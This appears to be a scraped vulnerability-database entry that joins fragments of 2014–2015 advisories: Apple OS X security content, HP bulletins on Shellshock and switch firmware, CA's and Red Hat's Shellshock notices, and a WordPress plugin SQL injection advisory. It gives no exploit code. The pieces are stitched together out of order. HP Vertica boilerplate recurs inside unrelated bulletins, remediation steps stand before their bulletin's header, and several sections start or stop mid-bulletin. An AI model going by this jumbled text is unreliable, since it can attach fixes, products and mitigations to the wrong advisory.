This issue was addressed by unsliding the addresses before returning
them.
CVE-ID
CVE-2014-4491 : @PanguTeam, Stefan Esser
Kernel
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IOSharedDataQueue objects. This issue was
addressed through relocation of the metadata.
CVE-ID
CVE-2014-4461 : @PanguTeam
LaunchServices
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious JAR file may bypass Gatekeeper checks
Description: An issue existed in the handling of application
launches which allowed certain malicious JAR files to bypass
Gatekeeper checks. This issue was addressed through improved handling
of file type metadata.
CVE-ID
CVE-2014-8826 : Hernan Ochoa of Amplia Security
libnetcore
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious, sandboxed app can compromise the networkd
daemon
Description: Multiple type confusion issues existed in networkd's
handling of interprocess communication. The issue is addressed
through additional type checking.
CVE-ID
CVE-2014-4492 : Ian Beer of Google Project Zero
LoginWindow
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A Mac may not lock immediately upon wake
Description: An issue existed in the rendering of the lock screen.
This issue was addressed through improved screen rendering while
locked.
CVE-ID
CVE-2014-8827 : Xavier Bertels of Mono, and multiple OS X seed
testers
lukemftp
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Using the command line ftp tool to fetch files from a
malicious http server may lead to arbitrary code execution
Description: A command injection issue existed in the handling of
HTTP redirects. This issue was addressed through improved validation
of special characters.
CVE-ID
CVE-2014-8517
OpenSSL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Multiple vulnerabilities in OpenSSL 0.9.8za, including one
that may allow an attacker to downgrade connections to use weaker
cipher-suites in applications using the library
Description: Multiple vulnerabilities existed in OpenSSL 0.9.8za.
These issues were addressed by updating OpenSSL to version 0.9.8zc.
CVE-ID
CVE-2014-3566
CVE-2014-3567
CVE-2014-3568
Sandbox
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A design issue existed in the caching of sandbox
profiles which allowed sandboxed applications to gain write access to
the cache. This issue was addressed by restricting write access to
paths containing a "com.apple.sandbox" segment. This issue does
not affect OS X Yosemite v10.10 or later.
CVE-ID
CVE-2014-8828 : Apple
SceneKit
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: A malicious application could execute arbitrary code leading
to compromise of user information
Description: Multiple out of bounds write issues existed in
SceneKit. These issues were addressed through improved bounds
checking.
CVE-ID
CVE-2014-8829 : Jose Duart of the Google Security Team
SceneKit
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Viewing a maliciously crafted Collada file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in SceneKit's handling
of Collada files. This issue was addressed through improved validation of
accessor elements.
CVE-ID
CVE-2014-8830 : Jose Duart of Google Security Team
Security
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A downloaded application signed with a revoked Developer ID
certificate may pass Gatekeeper checks
Description: An issue existed with how cached application
certificate information was evaluated. This issue was addressed with
cache logic improvements.
CVE-ID
CVE-2014-8838 : Apple
security_taskgate
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: An app may access keychain items belonging to other apps
Description: An access control issue existed in the Keychain.
Applications signed with self-signed or Developer ID certificates
could access keychain items whose access control lists were based on
keychain groups. This issue was addressed by validating the signing
identity when granting access to keychain groups.
CVE-ID
CVE-2014-8831 : Apple
Spotlight
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: The sender of an email could determine the IP address of the
recipient
Description: Spotlight did not check the status of Mail's "Load
remote content in messages" setting. This issue was addressed by
improving configuration checking.
CVE-ID
CVE-2014-8839 : John Whitehead of The New York Times, Frode Moe of
LastFriday.no
Spotlight
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Spotlight may save unexpected information to an external
hard drive
Description: An issue existed in Spotlight where memory contents may
have been written to external hard drives when indexing. This issue
was addressed with better memory management.
CVE-ID
CVE-2014-8832 : F-Secure
SpotlightIndex
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: Spotlight may display results for files not belonging to the
user
Description: A deserialization issue existed in Spotlight's handling
of permission caches. A user performing a Spotlight query may have
been shown search results referencing files for which they don't have
sufficient privileges to read. This issue was addressed with improved
bounds checking.
CVE-ID
CVE-2014-8833 : David J Peacock, Independent Technology Consultant
sysmond
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: A type confusion vulnerability existed in sysmond that
allowed a local application to escalate privileges. The issue was
addressed with improved type checking.
CVE-ID
CVE-2014-8835 : Ian Beer of Google Project Zero
UserAccountUpdater
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: Printing-related preference files may contain sensitive
information about PDF documents
Description: OS X Yosemite v10.10 addressed an issue in the handling
of password-protected PDF files created from the Print dialog where
passwords may have been included in printing preference files. This
update removes such extraneous information that may have been present
in printing preference files.
CVE-ID
CVE-2014-8834 : Apple
Note: OS X Yosemite 10.10.2 includes the security content of Safari
8.0.3. For further details see https://support.apple.com/kb/HT204243
OS X Yosemite 10.10.2 and Security Update 2015-001 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
.
Open the PXE Configuration Utility on the HP Insight Control server
deployment window
Select Linux Managed from the Boot Menu options
Click the Edit button. Clicking the Edit button displays the Edit Shared Menu
Option window
Uncheck the x86 option in Operating System and Processor Options and click
OK.
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
HP has released the following updates to resolve this vulnerability for HP
Vertica products.
Update to the latest VM image available at: https://my.vertica.com
For customers using the AMI version HP Vertica Analytics platform, please
install the latest image available at Amazon.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P.
Note: HP and the switch vendor recommend running an active version of
Fabric OS (FOS) listed on the HP Single Point of Connectivity Knowledge
(SPOCK) website ( http://h20272.www2.hp.com/ ) and applying the work-around
information provided in the MITIGATION INFORMATION section below to protect
HP StoreFabric B-series switches from this vulnerability.
Fabric OS (FOS) v7.3.0b (This version will be available soon and this
bulletin will be revised at that time)
The following focused fix FOS versions are available for the previously
released versions and have been renamed to include an additional hexadecimal
character appended to the FOS version on which it is based:
FOS v7.2.1c1
FOS v7.2.0d6
FOS v7.1.2b1
FOS v7.1.1c1
FOS v7.1.0cb
FOS v7.0.2e1
FOS v7.0.0d1
FOS v6.4.3f3
FOS v6.4.2a3
FOS v6.2.2f9
MITIGATION INFORMATION
HP recommends the following steps to reduce the risk of this vulnerability:
- Place the HP StoreFabric SAN switch and other data center critical
infrastructure behind a firewall to disallow access from the Internet.
- Change all HP StoreFabric switch default account passwords, including
the root passwords, from the default factory passwords.
- Examine the list of accounts, including ones on the switch and those
existing on remote authentication servers such as RADIUS, LDAP, and TACACS+,
to ensure only necessary personnel can gain access to HP StoreFabric FOS
switches. Delete guest accounts and temporary accounts created for one-time
usage needs.
- Utilize FOS password policy management to strengthen the complexity,
age, and history requirements of switch account passwords
| VAR-201409-1147 | CVE-2014-7186 | GNU Bash shell executes commands in exported functions in environment variables |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue. QTS, provided by QNAP Systems, Inc., is the OS for Turbo NAS. QTS contains an OS command injection vulnerability (CWE-78) caused by the GNU Bash vulnerability (JVNVU#97219505). This vulnerability information was reported to IPA under the Information Security Early Warning Partnership, and JPCERT/CC coordinated with the developer. Reporter: Yuki Wakisaka, University of Electro-Communications. Arbitrary OS commands may be executed with the privileges of the application.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
GNU Bash 3.2 and later are vulnerable; prior versions may also be affected.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script.
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
Issued: October 01, 2014
Updated: October 03, 2014
CA Technologies is investigating multiple GNU Bash vulnerabilities,
referred to as the "Shellshock" vulnerabilities, which were publicly
disclosed on September 24-27, 2014. CVE identifiers CVE-2014-6271,
CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and
CVE-2014-6278 have been assigned to these vulnerabilities.
The CA Technologies Enterprise Information Security team has led a
global effort to identify and remediate systems and products discovered
with these vulnerabilities. We continue to patch our systems as fixes
become available, and we are providing fixes for affected CA
Technologies products.
CA Technologies continues to aggressively scan our environments
(including servers, networks, external facing applications, and SaaS
environments) to proactively monitor, identify, and remediate any
vulnerability when necessary.
Risk Rating
High
Platform
AIX
Android (not vulnerable, unless rooted)
Apple iOS (not vulnerable unless jailbroken)
Linux
Mac OS X
Solaris
Windows (not vulnerable unless Cygwin or similar ported Linux tools
with Bash shell are installed)
Other UNIX/BSD based systems if Bash is installed
Any other OS or JeOS that utilizes Bash
Affected Products
The following products have been identified as potentially vulnerable,
and we have made fixes available for all of these products.
CA API Management (Linux appliance only)
CA Application Performance Management (TIM is the only affected APM
component)
CA Application Performance Management Cloud Monitor
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM)
CA Layer 7 products (API Gateway, Mobile Access Gateway, API Management
Portal)
CA User Activity Reporting Module (Enterprise Log Manager)
Note: This security notice will be updated if other CA Technologies
products are determined to be vulnerable.
In most cases, the Bash vulnerabilities will need to be patched by OS
vendors. Exceptions may include CA Technologies appliances, and
software products that include Linux, UNIX or Mac OS X based operating
systems (that include Bash).
Affected Components
CentOS
Cygwin
GNU Bash
Red Hat Enterprise Linux
SUSE Linux
Non-Affected Products
IMPORTANT NOTE: This listing includes only a small subset of the
unaffected CA Technologies products. We're including unaffected
products that customers have already inquired about. While the
following CA Technologies products are not directly affected by the
Bash vulnerabilities, the underlying operating systems that CA
Technologies software is installed on may be vulnerable. We strongly
encourage our customers to follow the recommendations provided by their
vendors for all operating systems they utilize.
All CA SaaS / On Demand products were either not vulnerable or have
already been patched.
CA AHS / PaymentMinder - AHS App is not vulnerable. The AHS app does
not execute CGI scripts, or spawn or execute shell commands from within
the app. AHS infrastructure already patched.
CA Asset Portfolio Management
CA AuthMinder (Arcot WebFort)
CA AuthMinder for Business Users
CA AuthMinder for Consumers
CA AutoSys products - We use the bash shell that comes with the
operating system and the customer is responsible for patching their OS.
Additionally, the agents themselves do not distribute any scripts that
use bash.
CA Clarity On Demand
CA CloudMinder - CloudMinder does not include the Bash Shell in BoM, or
use it, but because we are deployed on RHEL, customers may be
indirectly affected. Customers using RHEL should apply patches provided
by Red Hat.
CA Console Management for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA ControlMinder
CA DataMinder (formerly DLP) products – Software and appliance
confirmed not vulnerable. Note: Linux Agents shipped, but no public SSH
or Web apps are used in these agents. Customers should patch bash shell
on any Linux server with DataMinder agents. DataMinder agents should
continue to function normally.
CA Digital Payments SaaS (previously patched)
CA Directory
CA eCommerce SaaS / On Demand (previously patched)
CA Endevor Software Change Manager
CA Federation (formerly SiteMinder Federation)
CA GovernanceMinder
CA IdentityMinder
CA Infrastructure Management
CA JCLCheck
CA Job Management for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA NetQoS GigaStor Observer Expert
CA Network Flow Analysis
CA Performance Management for OpenVMS - Our OpenVMS products do not
bundle bash, and they do not supply bash scripts; we use nothing but
the native DCL CLI.
CA RiskMinder
CA Service Desk Manager
CA Service Operations Insight (SOI)
CA SiteMinder
CA SOLVE:Access
CA Spectrum for Linux - Not vulnerable. Be sure to apply bash fixes
from your underlying operating system vendor.
CA Strong Authentication
CA System Watchdog for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA Top Secret
CA Universal Job Management Agent for OpenVMS - Our OpenVMS products do
not bundle bash, and they do not supply bash scripts; we use nothing
but the native DCL CLI.
CA Virtual Assurance for Infrastructure Managers (VAIM)
Solution
CA Technologies has issued the following fixes to address the
vulnerabilities.
CA API Management:
Patches for Linux appliance are available through CA Support to
customers of Gateway (applicable for all versions – 6.1.5, 6.2, 7.0,
7.1, 8.0, 8.1, 8.1.1, 8.1.02).
CA Application Performance Management:
KB article for APM TIM has been published. APM TIM is the only part of
APM that was affected. Refer to TEC618037.
CA Application Performance Management Cloud Monitor:
New images are available for subscribers. Download the latest OPMS
version 8.2.1.5. For assistance, contact CA Support.
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM):
Very low risk. 9.6 is not affected. 9.5 Installation uses Bash. We do
not use Bash at all for the CEM operating system that we have shipped
in the past. This means that customers who patch the OS will not impact
the ability of the CEM TIMsoft to operate. However, prior to version
9.6, the TIM installation script does use the bash shell. See new KB
article TEC618037 for additional information.
CA Layer 7 (API Gateway, Mobile Access Gateway, API Management Portal):
Fixes for all Bash vulnerabilities and a security bulletin are available
on the Layer 7 Support website.
CA User Activity Reporting Module (Enterprise Log Manager):
All 12.5 and 12.6 GA versions are potentially affected. Patches
provided on 2014-09-30. To get the patch, use the OS update
functionality to get the latest R12.6 SP1 subscription update. Note
that you can update R12.5 SPx with the R12.6 SP1 OS update. For
assistance, contact CA Support.
Workaround
None
To help mitigate the risk, we do strongly encourage all customers to
follow patch management best practices, and in particular for operating
systems affected by the Bash Shellshock vulnerabilities.
References
CVE-2014-6271 - Bash environment variable command injection
CVE-2014-7169 - Bash environment variable incomplete fix for CVE-2014-6271
CVE-2014-7186 - Bash parser redir_stack memory corruption
CVE-2014-7187 - Bash nested flow control constructs off-by-one
CVE-2014-6277 - Bash untrusted pointer use uninitialized memory
CVE-2014-6278 - Bash environment variable command injection
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Change History
v1.0: 2014-10-01, Initial Release
v1.1: 2014-10-02, Added AuthMinder, Strong Authentication, VAIM,
Clarity OD, All SaaS/OD products to list of Non-Affected Products.
v1.2: 2014-10-03, Added RiskMinder to Non-Affected Products. Updated
UARM solution info.
If additional information is required, please contact CA Technologies
Support at https://support.ca.com.
If you discover a vulnerability in CA Technologies products, please
report your findings to the CA Technologies Product Vulnerability
Response Team at vuln@ca.com.
PGP key:
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Security Notices
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Regards,
Ken Williams
Director, Product Vulnerability Response Team
CA Technologies | One CA Plaza | Islandia, NY 11749 | www.ca.com
Ken.Williams@ca.com | vuln@ca.com
Copyright © 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y.
11749. All other trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.
HP Product                                              Firmware Version
HP StoreEver ESL G3 Tape Libraries with MCB version 2   680H_GS40701
HP StoreEver ESL G3 Tape Libraries with MCB version 1   656H_GS10801
The firmware is customer installable and is available in the Drivers,
Software & Firmware section at the following location:
http://www.hp.com/support/eslg3
Notes:
- Updating the library firmware requires a reboot of the library.
- If the library firmware cannot be updated, HP recommends following the
Mitigation Instructions below.
- Disable DHCP and only use static IP addressing.
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: rhev-hypervisor6 security update
Advisory ID: RHSA-2014:1354-01
Product: Red Hat Enterprise Virtualization
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html
Issue date: 2014-10-02
CVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169
CVE-2014-7186 CVE-2014-7187
=====================================================================
1. Summary:
An updated rhev-hypervisor6 package that fixes several security issues is
now available.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
Relevant releases/architectures:
RHEV-M 3.4 - noarch
3. Description:
The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization
Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor
is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes
everything necessary to run and manage virtual machines: a subset of the
Red Hat Enterprise Linux operating environment and the Red Hat Enterprise
Virtualization Agent.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for
the Intel 64 and AMD64 architectures with virtualization extensions.
A flaw was found in the way Bash evaluated certain specially crafted
environment variables. An attacker could use this flaw to override or
bypass environment restrictions to execute shell commands. Certain services
and applications allow remote unauthenticated attackers to provide
environment variables, allowing them to exploit this issue. (CVE-2014-6271)
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One)
input from certain RSA signatures. (CVE-2014-1568)
It was discovered that the fixed-sized redir_stack could be forced to
overflow in the Bash parser, resulting in memory corruption, and possibly
leading to arbitrary code execution when evaluating untrusted input that
would not otherwise be run as code. (CVE-2014-7186)
An off-by-one error was discovered in the way Bash was handling deeply
nested flow control constructs. (CVE-2014-7187)
Red Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271,
and the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges
Antoine Delignat-Lavaud and Intel Product Security Incident Response Team
as the original reporters of CVE-2014-1568.
Users of the Red Hat Enterprise Virtualization Hypervisor are advised to
upgrade to this updated package.
Package List:
RHEV-M 3.4:
Source:
rhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm
noarch:
rhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-1568.html
https://www.redhat.com/security/data/cve/CVE-2014-6271.html
https://www.redhat.com/security/data/cve/CVE-2014-7169.html
https://www.redhat.com/security/data/cve/CVE-2014-7186.html
https://www.redhat.com/security/data/cve/CVE-2014-7187.html
https://access.redhat.com/security/updates/classification/#critical
No other firmware
stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below
for the MDS products. Software version 6.2(9a) includes the
fixes for the vulnerability in HP StoreFabric C-series MDS switches that
currently support NX-OS 6.X releases. Software version 5.2(8e) includes the fix
for the vulnerability in HP C-series MDS switches that currently support
NX-OS 5.X releases. This bulletin will be revised
when these updates become available.
MITIGATION INFORMATION
If updating to a NX-OS version containing the fix is not currently possible,
HP recommends the following steps to reduce the risk of this vulnerability:
The "ssh" or "telnet" features may be disabled by the admin user. All MDS and
Nexus 5K switches can function in this configuration. Access is available
through the console port.
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
HP has released the following updates to resolve this vulnerability for HP
Vertica products.
Update to the latest VM image available at: https://my.vertica.com
For customers using the AMI version HP Vertica Analytics platform, please
install the latest image available at Amazon.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P.
Please refer to the RESOLUTION
section below for a list of impacted products.
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04558068
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04558068
Version: 1
HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server
Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-02-02
Last Updated: 2015-02-02
Potential Security Impact: Multiple vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Insight
Control for Linux Central Management Server Pre-boot Execution Environment
that could be exploited remotely resulting in Denial of Service (DoS),
disclosure of information, and other vulnerabilities.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
CVE-2014-7196
SSRT101742
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control for Linux Central Management Server Pre-boot Execution
Environment running Bash Shell
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference        Base Vector                     Base Score
CVE-2014-6271    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-6277    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-6278    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7169    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7186    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7187    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7196    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve these vulnerabilities.
Follow these steps to update the HP Insight Control for Linux Central
Management Server Pre-boot Execution Environment:
NOTE: The following procedure updates the bash shell on the Linux Pre-boot
Execution Environment.
On the Production RHEL 6.2 OS:
a. Prepare temporary directory for Bash update software:
# mkdir -p $HOME/tmp/bash
# cd $HOME/tmp/bash
# pwd
<home directory>/tmp/bash
b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for
Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html
to the temporary directory '$HOME/tmp/bash'.
c. Extract the Bash update software package.
# rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv
d. Verify the version of the Bash update software:
# ./bin/bash --version
GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)
e. Verify version dependencies:
# ldd ./bin/bash
linux-gate.so.1 => (0x008a7000)
libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000)
libdl.so.2 => /lib/libdl.so.2 (0x002c0000)
libc.so.6 => /lib/libc.so.6 (0x0012e000)
/lib/ld-linux.so.2 (0x00108000)
f. Create archive file from '/lib' to copy and install on the Insight Control
for Linux Central Management Server Pre-boot Execution Environment system:
# mkdir $HOME/tmp/lib
# cd /lib
# cp * $HOME/tmp/lib
# cd $HOME/tmp
# pwd
<home directory>/tmp
# tar cvf bash_lib.tar *
2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production
RHEL 6.2 OS system to the Insight Control for Linux Central Management Server
Pre-boot Execution Environment system.
On the HP Insight Control for Linux Central Management Server Pre-boot
Execution Environment system:
a. Create a temporary folder for the toolkit and copy the toolkit there:
# mkdir -p $HOME/tmp/temp-toolkit
# cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz $HOME/tmp/temp-toolkit
b. Extract the file 'toolkit.tar.gz' into the temporary folder:
# cd $HOME/tmp/temp-toolkit
# tar zxvf toolkit.tar.gz
# mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp
c. Verify the version of the toolkit Bash:
# $HOME/tmp/temp-toolkit/bin/bash --version
GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005
Free Software Foundation, Inc.
d. Verify dependencies versions:
# ldd $HOME/tmp/temp-toolkit/bin/bash
linux-gate.so.1 => (0xffffe000)
libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000)
libdl.so.2 => /lib/libdl.so.2 (0x008bf000)
libc.so.6 => /lib/libc.so.6 (0x00777000)
/lib/ld-linux.so.2 (0x00755000)
e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib'.
Then copy the bash binary and the library files to their respective
locations:
# tar xvf $HOME/tmp/bash_lib
# cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin
# cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib
f. Create the updated toolkit gzipped archive file and place in
/usr/share/systemimager/boot/i386/standard
# tar czvf toolkit.tar.gz *
# cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard
HISTORY
Version:1 (rev.1) - 2 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
| VAR-201410-1086 | CVE-2014-6242 | WordPress for All In One WP Security & Firewall In the plugin SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. Also, by abusing Cross-Site Request Forgery, a third party may be able to execute SQL commands.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
All In One WP Security & Firewall 3.8.2 is vulnerable; other versions may also be affected. WordPress is a blogging platform developed by the WordPress Software Foundation in PHP; it supports setting up personal blogging websites on PHP and MySQL servers.
Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication: September 3, 2014 [without technical details]
Vendor Notification: September 3, 2014
Vendor Patch: September 12, 2014
Public Disclosure: September 24, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges; however, they can also be exploited by a non-authenticated attacker via a CSRF vector. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
